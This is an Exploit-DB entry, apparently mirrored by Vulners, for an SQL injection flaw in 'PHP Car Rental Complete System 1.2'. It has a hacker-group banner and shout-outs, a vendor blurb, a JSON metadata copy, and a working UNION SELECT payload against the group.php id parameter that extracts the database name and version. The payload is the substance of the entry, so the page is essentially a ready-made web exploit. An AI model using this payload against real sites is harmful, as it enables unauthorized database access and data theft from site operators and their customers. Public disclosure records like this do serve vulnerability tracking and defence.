Search...

PHP Car Rental Complete System 1.2 - SQL Injection Vulnerability

2010-06-06T00:00:00

ID EDB-ID:13747
Type exploitdb
Reporter Sid3^effects
Modified 2010-06-06T00:00:00

Description

PHP car rental complete System V1.2 SQli vulnerability. Webapps exploit for php platform

                                        
                                            # Title:PHP car rental complete System V1.2 SQli vulnerability
# Author: Sid3^effects
# Published: 2010-06-06 
# price:450 EURo
# email:shell_c99@yahoo.com
# vendor: NUNO PEREIRA
# url : http://www.acarhire.me.uk/
############################################################################
        ooooo  .oooooo.  oooooo   oooooo     oooo 
        `888' d8P'  `Y8b  `888.    `888.     .8' 
         888 888           `888.   .8888.   .8' 
         888 888            `888  .8'`888. .8' 
         888 888             `888.8'  `888.8'  
         888 `88b    ooo      `888'    `888' 
        o888o `Y8bood8P'       `8'      `8'    
                                          
-------------------------------------------------------------------------------------- 
#####################Sid3^effects aKa HaRi################################## 
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] 
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L,CR4C|&lt; 008,M4n0j,MaYuR 
#ShouTZ:kedar,dec0d3r,41.w4r10r
#spl shoutz:LiquidWorm,gunslinger_ :D      
#Catch us at www.andhrahackers.com or www.teamicw.in 
############################################################################ 
Description :
PHP Car Rental-Script You can try our latest stable release as it becomes available. To launch the demo open both
the web site and control panel views so you can preview your changes as they are made in real time from the
control panel. its very simple to use for the client and for the administration to change prices aand add
promotions i also has a built in newsletter facility and email collection
############################################################################ 

Xploit :
   PHP car rental complete System V1.2 suffers from a sqli vulnerability..
  url:http://server/group.php?id=-2+union+select+1,database(),3,4,5,6,7,8,version(),10,11,12--
 
         
############################################################################ 
#spl thks: exploit-db team
#Sid3^effects

JSON Vulners Source

Initial Source

{"id": "EDB-ID:13747", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP Car Rental Complete System 1.2 - SQL Injection Vulnerability", "description": "PHP car rental complete System V1.2 SQli vulnerability. Webapps exploit for php platform", "published": "2010-06-06T00:00:00", "modified": "2010-06-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/13747/", "reporter": "Sid3^effects", "references": [], "cvelist": [], "lastseen": "2016-02-01T18:24:10", "viewCount": 4, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-01T18:24:10", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T18:24:10", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://www.exploit-db.com/download/13747/", "sourceData": "# Title:PHP car rental complete System V1.2 SQli vulnerability\r\n# Author: Sid3^effects\r\n# Published: 2010-06-06 \r\n# price:450 EURo\r\n# email:shell_c99@yahoo.com\r\n# vendor: NUNO PEREIRA\r\n# url : http://www.acarhire.me.uk/\r\n############################################################################\r\n ooooo .oooooo. oooooo oooooo oooo \r\n `888' d8P' `Y8b `888. `888. .8' \r\n 888 888 `888. .8888. .8' \r\n 888 888 `888 .8'`888. .8' \r\n 888 888 `888.8' `888.8' \r\n 888 `88b ooo `888' `888' \r\n o888o `Y8bood8P' `8' `8' \r\n \r\n-------------------------------------------------------------------------------------- \r\n#####################Sid3^effects aKa HaRi################################## \r\n#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] \r\n#Thanks:*L0rd \u00c7rusAd\u00ear*,d4rk-blu\u2122\u00ae,R45C4L,CR4C|< 008,M4n0j,MaYuR \r\n#ShouTZ:kedar,dec0d3r,41.w4r10r\r\n#spl shoutz:LiquidWorm,gunslinger_ :D \r\n#Catch us at www.andhrahackers.com or www.teamicw.in \r\n############################################################################ \r\nDescription :\r\nPHP Car Rental-Script You can try our latest stable release as it becomes available. To launch the demo open both\r\nthe web site and control panel views so you can preview your changes as they are made in real time from the\r\ncontrol panel. its very simple to use for the client and for the administration to change prices aand add\r\npromotions i also has a built in newsletter facility and email collection\r\n############################################################################ \r\n\r\nXploit :\r\n PHP car rental complete System V1.2 suffers from a sqli vulnerability..\r\n url:http://server/group.php?id=-2+union+select+1,database(),3,4,5,6,7,8,version(),10,11,12--\r\n \r\n \r\n############################################################################ \r\n#spl thks: exploit-db team\r\n#Sid3^effects ", "osvdbidlist": []}